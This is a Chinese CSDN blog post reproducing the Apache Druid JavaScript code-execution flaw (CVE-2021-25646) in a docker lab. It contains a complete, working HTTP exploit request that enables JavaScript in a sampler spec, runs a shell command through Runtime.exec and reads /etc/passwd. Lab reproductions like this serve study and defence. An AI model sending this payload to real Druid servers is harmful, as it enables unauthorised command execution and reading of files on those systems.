Apache Druid 代码执行漏洞

最新推荐文章于 2024-03-08 10:47:35 发布
最新推荐文章于 2024-03-08 10:47:35 发布
阅读量313 收藏 1
点赞数 3
分类专栏: apache漏洞 文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53639243/article/details/136217274
版权

Apache Druid 是一种开源的分布式数据存储,旨在摄取大量数据,以提供低延迟和高并发的即时数据可见性、临时分析和查询。

Apache Druid 能够执行嵌入在各种类型请求中的用户提供的 JavaScript 代码。此功能旨在用于高信任环境,默认情况下处于禁用状态。但是,在 Druid 0.20.0 及更早版本中,经过身份验证的用户可以发送特制的请求,强制 Druid 为该请求运行用户提供的 JavaScript 代码,而不管服务器配置如何。这可以用来以 Druid 服务器进程的权限在目标计算机上执行代码。

使用docker 搭建环境

docker-compose up -d

复现:

访问http://192.168.92.130:8888/unified-console.html页面

exp的利用:

POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.92.130:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json

{
    "type":"index",
    "spec":{
        "ioConfig":{
            "type":"index",
            "firehose":{
                "type":"local",
                "baseDir":"/etc",
                "filter":"passwd"
            }
        },
        "dataSchema":{
            "dataSource":"test",
            "parser":{
                "parseSpec":{
                "format":"javascript",
                "timestampSpec":{

                },
                "dimensionsSpec":{

                },
                "function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
                "":{
                    "enabled":"true"
                }
                }
            }
        }
    },
    "samplerConfig":{
        "numRows":10
    }
}

您将看到 id 命令的输出: 

青梅fox
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现 || Apache Druid代码执行
失心少年
07-10 340
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!在Apache Druid使用Apache Kafka加载数据的场景下,未经身份认证的远程攻击者可配置Kafka连接属性,从而利用CVE-2023-25194漏洞触发JNDI注入,最终执行任意代码
Apache Druid远程代码执行漏洞(CVE-2021-25646)
weixin_44047654的博客
12-05 1618
Apache Druid远程代码执行漏洞(CVE-2021-25646)
Apache Druid 代码执行漏洞(CVE-2021-25646)
最新发布
qq_69775412的博客
03-08 695
Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用,并且默认是禁用的。然而,在Druid 0.20.0及以前的版本中,攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码,而不管服务器配置如何,这将导致代码和命令执行漏洞
Apache Druid中Kafka配置远程代码执行漏洞(MPS-2023-6623)
murphysec的博客
04-28 1696
Apache Druid 是一个高性能的数据分析引擎。 Kafka Connect模块曾出现JNDI注入漏洞(CVE-2023-25194),近期安全研究人员发现Apache Druid由于支持从 Kafka 加载数据的实现满足其利用条件,攻击者可通过修改 Kafka 连接配置属性进行 JNDI 注入攻击,进而在服务端执行任意恶意代码Apache Druid通过部署在内网,用户可对其开启身份认证机制降低漏洞利用风险。
Apache Druid RCE漏洞复现(QVD-2023-9629)
qq_50854662的博客
06-27 802
Apache Druid RCE漏洞复现(QVD-2023-9629)
Apache Druid远程代码执行漏洞响应通告
05-05
Apache Druid远程代码执行漏洞响应通告
【技术分享】CVE-2021-25646 Apache Druid 远程代码执行漏洞分析 .pdf
09-05
【技术分享】CVE-2021-25646 Apache Druid 远程代码执行漏洞分析 数据安全 web安全 威胁情报 安全防护 安全测试
Log4j2漏洞检测工具
02-06
Apache log4j 2是一款...经验证,Apache Struts2、Apache Solr、Apache DruidApache Flink等众多组件与大型应用均受影响,该漏洞无需授权即可远程代码执行,一旦被攻击者利用会造成严重后果,影响范围覆盖各行各业。
JAVA上百实例源码以及开源项目源代码
09-17
使用时候只需在控制台窗口执行jar就可以了。 Java 3DMenu 界面源码 5个目标文件 内容索引:Java源码,窗体界面,3DMenu  Java 3DMenu 界面源码,有人说用到游戏中不错,其实平时我信编写Java应用程序时候也能用到吧,...
Goby 最全最新POC共计448个
08-30
CNVD-2021-00876、Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109、XXL-JOB 任务调度中心 后台默认弱口令、帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757、锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞、蜂网...
Apache Druid远程代码执行漏洞(CVE-2021-25646)
chaojixiaojingang
03-15 9523
1.漏洞描述 Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用Apache Druid漏洞可以执行任意代码。 2.影响版本 Apache Druid < 0.20...
Apache Druid命令执行漏洞复现
weixin_53696027的博客
06-02 491
CVE-2019-25646是由由阿里云安全发现的 Apache Druid 远程代码执行漏洞
Apache Druid 远程代码执行漏洞 (CVE-2021-25646)
qq_22807425的博客
02-02 687
Apache Druid 远程代码执行漏洞 (CVE-2021-25646) 0x00 前言 首发于timeline sec 团队公众号 阿里云安全向Apache官方报告了Apache Druid远程代码执行漏洞,分配CVE编号为CVE-2021-25646 0x01 漏洞描述 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的jso
CVE-2021-25646:Apache Druid远程代码执行漏洞
就是法老
08-24 1979
一:漏洞描述 阿里云安全向Apache官方报告了Apache Druid远程代码执行漏洞,分配CVE编号为CVE-2021-25646 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意代码。 影响范围:Apache Druid &l
Apache Druid 远程代码执行漏洞( CVE-2021-25646)
bqnagus
09-29 553
描述 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码
Apache Druid Console 远程命令执行漏洞
墨痕诉清风的博客
02-22 1112
Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。
Apache Tomcat远程代码执行漏洞(CVE-2019-0232)
TivonaLH的博客
09-04 4460
受影响的版本 Apache Tomcat 9.0.0.M1 to 9.0.17 Apache Tomcat 8.5.0 to 8.5.39 Apache Tomcat 7.0.0 to 7.0.93 不受影响的版本 Apache Tomcat 9.0.18 Apache Tomcat 8.5.40 Apache Tomcat 7.0.94 解决方案: 关闭enableCmdLineA...
Apache Druid远程代码执行漏洞[CVE-2021-25646]
公众号shadow sock7
02-01 657
安装教程: 参考: https://druid.apache.org/docs/latest/tutorials/index.html 执行用户提供的脚本: https://druid.apache.org/docs/latest/development/javascript.html
Apache Druid rce漏洞
04-27
关于Apache Druid的RCE漏洞,我可以为您提供一些基本信息。Apache Druid是一个高性能、实时分析数据的开源数据存储系统,常用于数据探索和可视化分析。2021年5月,Apache Druid官方发布了一份安全公告,称该软件存在一个高风险的远程代码执行(RCE)漏洞,该漏洞可能导致攻击者可以通过恶意负载文件执行任意代码,甚至可能完全控制受影响的系统。建议用户及时升级到受影响版本的补丁版本。同时,我们也应该加强对系统的安全审计和管理,以及对软件漏洞的及时关注和处理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值